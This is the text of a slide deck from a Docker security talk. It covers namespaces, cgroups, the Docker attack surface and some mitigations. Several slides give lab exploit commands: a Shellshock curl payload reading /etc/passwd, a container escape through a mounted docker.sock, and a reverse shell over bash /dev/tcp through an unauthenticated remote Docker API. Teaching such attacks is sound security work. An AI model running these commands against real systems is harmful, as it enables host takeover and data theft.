The document provides an overview of Docker, its attack surface, and potential vulnerabilities associated with its use. It discusses topics such as vulnerable images, privilege escalation, and misconfigurations, along with demonstrations of exploit techniques. Additionally, it highlights mitigation strategies and includes references for further reading on Docker security.

1. Vaibhav Gupta
Twitter: @VaibhavGupta_1
Its all about Docker!

2. § About Docker – 1 min Primer
§ Cgroups & Namespaces – Quick Demo
§ Docker Attack Surface
1. Exploiting Vulnerable Images
2. Docker --privilege flag
3. Privilege Esc. Using Docker.Sock
4. Abusing Docker Remote API

3. § Docker is just way of running processes with limited privileges
§ DEMO
§ docker run -it ubuntu sh
§ ps aux | grep sleep

4. § Cgroups
§ docker run -itd --pids-limit 5 alpine
§ sleep 10 & sleep 10 & sleep 10 & sleep 10 & sleep 10 & sleep 10
§ Namespaces (E.g. User Names)
§ vi /tmp/root-file.txt
§ docker run -itd -v /tmp:/shared alpine
§ Edit the file within container
§ Mitigation
§ sudo dockerd --userns-remap=default

5. DOCKER
ATTACK
SURFACE

6. • Vulnerable Images
• Container running with unintended
privileges
• Docker Daemon Misconfigurations
• Un-Auth Docker Client Remote API
• Misconfigured or Vulnerable Hosts
• Insecure Registry
• Backdoored Images
• ??

7. EXPLOITING
VULNERABLE
IMAGES
§ Sample Vulnerable App
§ docker run --rm -it -p 8080:80
vulnerables/cve-2014-6271
§ Exploitation
§ curl -H "user-agent: () { :; }; echo; echo;
/bin/bash -c 'cat /etc/passwd'"
http://vulnerable-server:8080/cgi-
bin/vulnerable

8. § Some Container require /var/run/docker.sock to be mounted on containers
§ It is required if docker container requires to interact with host
§ For e.g. – ‘Dockerized’ Host Monitoring Application
ü docker run -itd -v /var/run/docker.sock:/var/run/docker.sock alpine
ü docker exec -it <id> sh
ü apk update
ü apk add -U docker
ü docker -H unix:///var/run/docker.sock run -it -v /:/test:ro -t alpine sh

9. § Allows to interact with remote Docker Daemon
§ No authentication required - By Default
§ Lets gain shell!
ü sudo apt install jq
ü sudo vi /lib/systemd/system/docker.service
ü ExecStart=/usr/bin/dockerd -H fd:// -H tcp://0.0.0.0:2375
ü sudo systemctl daemon-reload
ü sudo service docker restart
ü curl http://localhost:2375/containers/json | jq
ü docker -H tcp://localhost:2375 run --rm -v /:/mnt ubuntu chroot /mnt /bin/bash -c "bash -i >& /dev/tcp/172.17.0.1/8080 0>&1"

10. § docker run -itd alpine
§ docker run --rm -it --cap-drop=NET_RAW alpine sh
§ ping 127.0.0.1 -c 2
§ Printing Capabilities: capsh --print

11. § https://docs.docker.com/engine/security/security/
§ https://docs.docker.com/engine/security/userns-remap/
§ https://securityboulevard.com/2019/02/abusing-docker-api-socket/

12. § Email:Vaibhav.Gupta @ owasp.org
§ Twitter: @VaibhavGupta_1
§ Blog: https://exploits.work